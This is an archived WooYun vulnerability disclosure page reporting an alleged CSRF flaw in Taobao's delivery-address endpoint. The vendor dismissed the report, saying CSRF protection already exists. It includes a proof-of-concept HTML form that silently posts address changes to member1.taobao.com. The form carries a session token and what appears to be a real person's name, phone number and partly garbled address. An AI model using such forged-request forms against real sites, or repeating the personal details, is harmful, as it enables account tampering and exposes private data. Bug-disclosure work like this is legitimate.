乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-25: 细节已通知厂商并且等待厂商处理中 2015-12-25: 厂商已经主动忽略漏洞,细节向公众公开
如题
1、
http://member1.taobao.com/member/fresh/deliver_address.htm
2、
3、
<html> <body> <form action="http://member1.taobao.com/member/fresh/deliver_address.htm" method="POST"> <input type="hidden" name="action" value="DeliverAddressMgr" /> <input type="hidden" name="event_submit_do_save" value="anything" /> <input type="hidden" name="from" value="mbis" /> <input type="hidden" name="isFrame" value="false" /> <input type="hidden" name="token" value="" /> <input type="hidden" name="lang" value="zh-S" /> <input type="hidden" name="_tb_token_" value="OXM1aifkM5p" /> <input type="hidden" name="id" value="" /> <input type="hidden" name="x" value="25.03945" /> <input type="hidden" name="y" value="102.714729" /> <input type="hidden" name="reurl" value="" /> <input type="hidden" name="country" value="" /> <input type="hidden" name="prov" value="530000" /> <input type="hidden" name="provExt" value="" /> <input type="hidden" name="city" value="530100" /> <input type="hidden" name="area" value="530102" /> <input type="hidden" name="town" value="530102002" /> <input type="hidden" name="addressDetail" value="»¤¹ú·68ºÅ ÖйúÅ©Òµ·¢Õ¹ÒøÐÐÔÆÄÏÊ¡·ÖÐпͷ¿²¿" /> <input type="hidden" name="post" value="650001" /> <input type="hidden" name="fullName" value="ÀîöÎ" /> <input type="hidden" name="mobile_area" value="1" /> <input type="hidden" name="mobile" value="18206849493" /> <input type="hidden" name="phone_area" value="1" /> <input type="hidden" name="phoneSection" value="0871" /> <input type="hidden" name="phoneCode" value="3528991" /> <input type="hidden" name="phoneExt" value="352799" /> <input type="submit" value="Submit request" /> </form> </body></html>
4、
5、
危害等级:无影响厂商忽略
忽略时间:2015-12-25 16:13
您好,经审核此问题不存在,该处已有CSRF防护。感谢您对阿里巴巴安全的关注和支持。
暂无